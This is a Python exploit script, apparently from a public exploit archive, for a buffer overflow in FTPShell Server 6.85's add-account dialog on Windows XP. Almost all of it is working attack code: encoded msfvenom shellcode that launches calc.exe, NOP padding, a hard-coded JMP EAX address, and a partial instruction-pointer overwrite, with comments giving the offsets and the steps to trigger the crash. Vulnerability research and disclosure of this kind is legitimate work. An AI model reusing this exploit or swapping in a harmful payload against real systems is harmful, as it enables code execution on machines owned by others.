Share
#!/usr/bin/python  
# Exploit Title: FTPShell Server 6.85 - Add Account Buffer Overflow  
# Date: December 2nd, 2019  
# Exploit Author: boku  
# Vendor Homepage: http://www.ftpshell.com/index.htm  
# SOftware Link: http://www.ftpshell.com/downloadserver.htm  
# Program Name: FTPShell Server (Secure Plus edition)  
# Version: Version 6.85  
# Tested on: Windows XP Professional (32-bit)- 5.1.2600 Service Pack 3 Build 2600  
# Recreate:  
# - Install FTPShell Server v6.85  
# - open 'FTPShell Server Administrator'  
# - Click button 'Manage FTP Accounts..'  
# - Click button 'Configure accounts..'   
# - Click button 'Add'  
# - Run python script & transfer 'poc.txt' to windows box  
# - Open 'poc.txt' & select-all, then copy   
# - Paste poc.txt text blob into 'Login' text-box  
# - Press button 'OK'; program will crash & shellcode will execute  
  
blt = '\033[92m[\033[0m+\033[92m]\033[0m ' # green success bullet  
err = '\033[91m[\033[0m!\033[91m]\033[0m ' # red fail bullet  
  
try:   
f = open('poc.txt', 'w') # open file for write  
# Instructions @ Crash:   
# 1. mov ecx,[esi+7c0];   
# 2. mov eax,[ecx]; lea edx, [ebp-4]; push edx;   
# 3. call [eax+2c4];  
# exploit leaves 708 bytes for shellcode.  
#msfvenom -p windows/exec CMD='calc.exe' -a x86 --platform windows -b '\x00' -v shellcode -f python  
#x86/shikata_ga_nai chosen with final size 220  
shellcode = b""  
shellcode += b"\xbb\x4f\x79\xd7\xce\xda\xde\xd9\x74\x24\xf4"  
shellcode += b"\x5a\x2b\xc9\xb1\x31\x31\x5a\x13\x83\xea\xfc"  
shellcode += b"\x03\x5a\x40\x9b\x22\x32\xb6\xd9\xcd\xcb\x46"  
shellcode += b"\xbe\x44\x2e\x77\xfe\x33\x3a\x27\xce\x30\x6e"  
shellcode += b"\xcb\xa5\x15\x9b\x58\xcb\xb1\xac\xe9\x66\xe4"  
shellcode += b"\x83\xea\xdb\xd4\x82\x68\x26\x09\x65\x51\xe9"  
shellcode += b"\x5c\x64\x96\x14\xac\x34\x4f\x52\x03\xa9\xe4"  
shellcode += b"\x2e\x98\x42\xb6\xbf\x98\xb7\x0e\xc1\x89\x69"  
shellcode += b"\x05\x98\x09\x8b\xca\x90\x03\x93\x0f\x9c\xda"  
shellcode += b"\x28\xfb\x6a\xdd\xf8\x32\x92\x72\xc5\xfb\x61"  
shellcode += b"\x8a\x01\x3b\x9a\xf9\x7b\x38\x27\xfa\xbf\x43"  
shellcode += b"\xf3\x8f\x5b\xe3\x70\x37\x80\x12\x54\xae\x43"  
shellcode += b"\x18\x11\xa4\x0c\x3c\xa4\x69\x27\x38\x2d\x8c"  
shellcode += b"\xe8\xc9\x75\xab\x2c\x92\x2e\xd2\x75\x7e\x80"  
shellcode += b"\xeb\x66\x21\x7d\x4e\xec\xcf\x6a\xe3\xaf\x85"  
shellcode += b"\x6d\x71\xca\xeb\x6e\x89\xd5\x5b\x07\xb8\x5e"  
shellcode += b"\x34\x50\x45\xb5\x71\xae\x0f\x94\xd3\x27\xd6"  
shellcode += b"\x4c\x66\x2a\xe9\xba\xa4\x53\x6a\x4f\x54\xa0"  
shellcode += b"\x72\x3a\x51\xec\x34\xd6\x2b\x7d\xd1\xd8\x98"  
shellcode += b"\x7e\xf0\xba\x7f\xed\x98\x12\x1a\x95\x3b\x6b"  
# 3. call [eax+2c4];  
# - Hexadecimal 0x2c4 = 708 decimal  
junk1 = '\x90' * (708-len(shellcode))  
# - The call [eax+2c4] instruction will pass execution to the address located at EAX+708  
# - Setting [EAX+708] to an existing JMP EAX instruction will pass execution to our shellcode  
# - 0x7c9ef4c9 jmp eax | (Execute&Read) shell32.dll; aslr&rebase: false  
jmpEax = '\xc9\xf4\x9e\x7c'  
# 1. mov ecx,[esi+7c0];   
# - ESI = 0x0012C108  
# - esi+7c0 is in our supplied buffer, on the stack, at the time of the crash.  
# - Control ECX @ offset 1568 bytes  
junk2 = '\x90' * (1568-len(shellcode+junk1+jmpEax))  
# 2. mov eax,[ecx];   
# - ECX = 0x0012B768 = PTR (located on Stack) to the beginning of our shellcode in the Heap   
# - EIP 3-Byte Overwrite - '\x68\xb7\x12'   
ecx = '\x68\xb7\x12' # - EIP 3-Byte Overwrite - '\x68\xb7\x12  
# - The '\x00' is supplied by the program when pressing the 'OK' button  
# - eax is now set to the address of our shellcode.  
f.write(shellcode+junk1+jmpEax+junk2+ecx)  
f.close() # close the file  
print blt + 'poc.txt created successfully'  
except:  
print err + 'poc.txt failed to create'